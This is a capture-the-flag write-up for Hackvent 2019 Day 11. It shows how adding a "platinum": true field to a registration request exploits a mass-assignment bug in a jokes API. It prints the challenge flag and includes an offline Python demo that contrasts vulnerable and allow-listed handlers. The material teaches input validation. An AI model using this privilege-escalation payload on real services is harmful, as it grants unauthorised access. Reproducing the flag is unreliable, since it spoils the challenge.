Hackvent 2019: Day 11


Challenge

HV19.11 Frolicsome Santa Jokes API

Introduction
The elves created an API where you get random jokes about santa.

Resources
Go and try it here: http://whale.hacking-lab.com:10101

HTML file mirror: HV19-Day11-FSJA-API-Description.html

Solution

We have the spec for the FSJA API that the elves have made. We use Postman to play around with the API to get a feel for how it works.

Following the instructions, we are able to register a new user and authenticate to get a token.
We use the following payload for our user data:

{
  "username": "mobeigi_test_1",
  "password": "ABCDEFG123"
}

Upon logging in with the /fsja/login endpoint we get a token which looks like this:

{
  "message": "Token generated",
  "code": 201,
  "token": "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp7InVzZXJuYW1lIjoibW9iZWlnaV90ZXN0XzEiLCJwbGF0aW51bSI6ZmFsc2V9LCJleHAiOjE1NzYwNTk5MzQuNzgwMDAwMDAwfQ.pbVVcSUmcBEgsV1vYcUs4tVwchH5GP8SaHulTIczpac"
}

The token is three dot-separated base64url segments, i.e. a JWT. Decoding the first two gives the header {"alg":"HS256"} and the payload {"user":{"username":"mobeigi_test_1","platinum":false},"exp":1576059934.780000000}; the third segment is the HMAC-SHA256 signature, which we cannot recompute without the server's key, so the platinum claim cannot simply be edited in the token itself.

We finally use the /fsja/random endpoint to get a joke:

{
  "joke": "People really act weird at Christmas time! What other time of year do you sit in front of a dead tree in the living room and eat nuts and sweets out of your socks?",
  "author": "Author Unknown",
  "platinum": false
}

The platinum field stands out to me the most.
As a random hunch, I decide to register a user and provide the platinum field value in the payload myself like so:

{
  "username": "mobeigi_test_2",
  "password": "ABCDEFG123",
  "platinum": true
}

I generate another joke and the API kindly provides me with the flag:

{
  "joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
  "author": "Santa",
  "platinum": true
}

Flag:

HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}
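The root cause is an input-validation (mass-assignment) bug: the registration endpoint copies whatever fields the client sends into the stored user record, and the login endpoint then correctly signs a token carrying that record, so the verified signature on the platinum claim means nothing. The script below is an added example, not the challenge's code or the original post's: it decodes the token shown above (inspection only, no signature check) and models the register/login/random flow with a vulnerable and an allow-listed registration handler. The secret key, in-memory user store and joke strings are made up for the example, and the /fsja/... endpoints are not contacted; everything runs offline.

```python
import base64
import hashlib
import hmac
import json
import time

# The token shown in the writeup above, issued to mobeigi_test_1.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VyIjp7InVzZXJuYW1lIjoibW9iZWlnaV90ZXN0XzEiLCJwbGF0aW51bSI6ZmFsc2V9"
    "LCJleHAiOjE1NzYwNTk5MzQuNzgwMDAwMDAwfQ."
    "pbVVcSUmcBEgsV1vYcUs4tVwchH5GP8SaHulTIczpac"
)


def b64url_decode(segment: str) -> bytes:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def jwt_claims(token: str) -> dict:
    """Decode header and payload for inspection only; the signature is NOT checked here."""
    header, payload, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}


# --- Toy model of the elves' API. Secret, user store and jokes are invented for this example. ---
SECRET = b"example-key-not-the-real-one"
USERS = {}  # username -> stored user record (passwords kept in the clear only to keep the toy short)


def register_vulnerable(body: dict) -> dict:
    """Mass assignment: every client-supplied field lands in the stored record,
    so "platinum": true in the request silently overrides the server-side default."""
    user = {"platinum": False}
    user.update(body)
    USERS[user["username"]] = user
    return user


ALLOWED_FIELDS = {"username", "password"}


def register_hardened(body: dict) -> dict:
    """Allow-list the writable fields; the privilege flag is never taken from the client."""
    unexpected = set(body) - ALLOWED_FIELDS
    if unexpected:
        raise ValueError("unexpected field(s): %s" % sorted(unexpected))
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    user = {"username": username, "password": password, "platinum": False}
    USERS[username] = user
    return user


def issue_token(user: dict, ttl: int = 3600) -> str:
    """Properly signed HS256 JWT: the crypto is fine, the claims come from the stored record."""
    header = b64url_encode(json.dumps({"alg": "HS256"}, separators=(",", ":")).encode())
    claims = {"user": {"username": user["username"], "platinum": user["platinum"]},
              "exp": time.time() + ttl}
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = hmac.new(SECRET, (header + "." + payload).encode("ascii"), hashlib.sha256).digest()
    return header + "." + payload + "." + b64url_encode(signature)


def verify_token(token: str) -> dict:
    """Constant-time HMAC check plus expiry; a tampered token is rejected here."""
    header, payload, signature = token.split(".")
    expected = hmac.new(SECRET, (header + "." + payload).encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload))
    if claims["exp"] < time.time():
        raise ValueError("token expired")
    return claims


def random_joke(token: str) -> dict:
    """The /random endpoint: trusts the platinum claim because the signature verified."""
    claims = verify_token(token)
    if claims["user"]["platinum"]:
        return {"joke": "(platinum joke; the flag would be here)", "author": "Santa", "platinum": True}
    return {"joke": "(regular joke)", "author": "Author Unknown", "platinum": False}


def tampered_token_rejected(token: str) -> bool:
    """Flipping platinum inside an issued token breaks the HMAC, so that path is closed."""
    header, payload, signature = token.split(".")
    claims = json.loads(b64url_decode(payload))
    claims["user"]["platinum"] = True
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    try:
        verify_token(header + "." + payload + "." + signature)
    except ValueError:
        return True
    return False


def registration_escalates(register) -> bool:
    """Replay the writeup's second registration against a handler: True if the client-supplied
    platinum flag survives all the way to the joke endpoint, False if the handler rejected it."""
    USERS.clear()
    try:
        user = register({"username": "mobeigi_test_2", "password": "ABCDEFG123", "platinum": True})
    except ValueError:
        return False
    return random_joke(issue_token(user))["platinum"]


if __name__ == "__main__":
    print(json.dumps(jwt_claims(PAGE_TOKEN), indent=2))
    print("vulnerable handler escalates:", registration_escalates(register_vulnerable))
    print("hardened handler escalates:  ", registration_escalates(register_hardened))
```

The point the flag text makes is visible in the two handlers: editing the claim inside the token fails verification, but the vulnerable handler lets the same value in one step earlier, before anything is signed, and the signature then vouches for it. Rejecting unknown fields outright (rather than silently dropping them) also makes probing of this kind show up in logs.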

Bonus

This challenge also contained the solution to HV19.H3 Hidden Three.

